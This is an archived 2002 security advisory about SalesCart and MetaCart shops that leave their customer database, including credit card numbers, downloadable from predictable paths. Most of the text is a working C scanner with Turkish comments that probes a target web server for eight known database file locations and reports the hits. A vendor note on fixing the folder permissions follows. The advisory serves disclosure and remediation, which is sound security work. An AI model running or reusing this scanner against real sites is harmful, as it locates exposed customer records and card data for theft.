24th Jun 2002 [SBWID-5478]
COMMAND
salescart, metacart remote database access
SYSTEMS AFFECTED
salescart up to 24 June 2002 ?
PROBLEM
Thanks to Tacettin Karadeniz [tacettinkaradeniz @ yahoo.com] report :
In a business website which is made by Salescart, all customer records
related to that website are reachable. All database can be hide to
shop.mdb file, in fpdb directory. Any user can be reach this database
whithous permission. There are some special informations this database
and they are; name, surname, adress, e-mail, phone number, credit card
number, company name ... The credit card numbers in shop.mdb file is
placed in query part.
Accessing any of the following URL will return the database used by the
product:
http://xxxshop.com/fpdb/shop.mdb
Exploit :
=========
/* Salescart ve Metacart kullanILan bir alI$veri$
sitesindeki mu$teri
kayItLarInI bulma */
/* tacettinkaradeniz@yahoo.com karadenizeregli@2002
*/
/* I LoVe CiLeK :>
/* Not: Bu programI ba$tan sona ben yazmadIm. Sadece
gerekli yerlerde degi$iklik yaparak istediGim duzene
getirdim :> */
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
void main(int argc, char *argv[])
{
char *bulunan;
char tampon[1024];
char mesaj[] = \"200\";
int toplam=0;
int sayac;
int buldum=0;
char shoptampon[20];
char *tmp[10];
char *hata[10];
int sock;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long giris;
unsigned long duzelt;
tmp[1]=\"GET /fpdb/shop.mdb HTTP/1.0\\n\\n\";
tmp[2]=\"GET /shoponline/fpdb/shop.mdb HTTP/1.0\\n\\n\";
tmp[3]=\"GET /database/metacart.mdb HTTP/1.0\\n\\n\";
tmp[4]=\"GET /shopping/database/metacart.mdb
HTTP/1.0\\n\\n\";
tmp[5]=\"GET /shop/database/metacart.mdb HTTP/1.0\\n\\n\";
tmp[6]=\"GET /metacart/database/metacart.mdb
HTTP/1.0\\n\\n\";
tmp[7]=\"GET /mcartfree/database/metacart.mdb
HTTP/1.0\\n\\n\";
tmp[8]=\"GET /ASP/cart/database/metacart.mdb
HTTP/1.0\\n\\n\";
hata[1] = \"/fpdb/shop.mdb \";
hata[2] = \"/shoponline/fpdb/shop.mdb \";
hata[3] = \"/database/metacart.mdb \";
hata[4] = \"/shopping/database/metacart.mdb \";
hata[5] = \"/shop/database/metacart.mdb \";
hata[6] = \"/metacart/database/metacart.mdb \";
hata[7] = \"/mcartfree/database/metacart.mdb \";
hata[8] = \"/ASP/cart/database/metacart.mdb \";
if (argc<2)
{
system(\"clear\");
printf(\"\\n\\t _ \");
printf(\"\\n\\t|_ ._ _ _ | o \");
printf(\"\\n\\t|_ | (/_ (_| | | \");
printf(\"\\n\\t _| \");
printf(\"\\n\\nSalescart - Metacart (c) 2002 \");
printf(\"\\nKullanImI : %s www.xxxshopxyz.com
\\n\\n\",argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror(\"gethostbyname\");
exit(0);
}
system(\"clear\");
printf(\"\\n\\t _ \");
printf(\"\\n\\t|_ ._ _ _ | o \");
printf(\"\\n\\t|_ | (/_ (_| | | \");
printf(\"\\n\\t _| \");
printf(\"\\n\\t Salescart - Metacart (c) 2002 \");
giris=inet_addr(argv[1]);
duzelt=ntohl(giris);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror(\"connect\");
}
send(sock, \"HEAD / HTTP/1.0\\n\\n\",17,0);
recv(sock, tampon, sizeof(tampon),0);
printf(\"%s\",tampon);
close(sock);
system(\"clear\");
printf(\"Tarama YapILIyor..\\n\\n\");
while(toplam++ < 8)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror(\"connect\");
}
for(sayac=0;sayac < 20;sayac++)
{
shoptampon[sayac] = \'\\0\';
}
send(sock, tmp[toplam],strlen(tmp[toplam]),0);
recv(sock, shoptampon, sizeof(shoptampon),0);
bulunan = strstr(shoptampon,mesaj);
if( bulunan != NULL)
{
printf(\"%s : \",hata[toplam]);
printf(\" Oleyyy.. Bulundu :\\)\\n\");++buldum;
}
close(sock);
}
if (buldum)
{
printf(\"\\n Tarama isLemi %s web sistesi icin
bitti.\\n\", argv[1]);
}
else printf (\"\\n Uzgunum tarama sonucu bir veri
bulunamamIstIr...\\n\\n\");
}
SOLUTION
Update (28 June 2002)
======
This security issue is caused when Salescart is improperly deployed
using Microsoft FrontPage and Microsoft IIS and the Microsoft Internet
Information Web Server (IIS4.0/IIS5.0) is incorrectly
administered/configured for the Web site where SalesCart is running.
Specifically, the /fpdb virtual directory permissions should NOT have
READ permissions enabled. The setting is completely configurable by the
SalesCart Merchant using FrontPage by opening the Web site and right
clicking the /fpdb folder, selecting properties and unchecking \"Allow
Files to be Browsed\". Since this is an issue with administering the
IIS web server and the FrontPage Web site rather than SalesCart, this
can only be corrected by the SalesCart Merchant or the Internet Service
Provider. See this knowledge base article from the vendor for more
information.
http://support.salescart.com/kb/KB-details.asp?key=5077
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
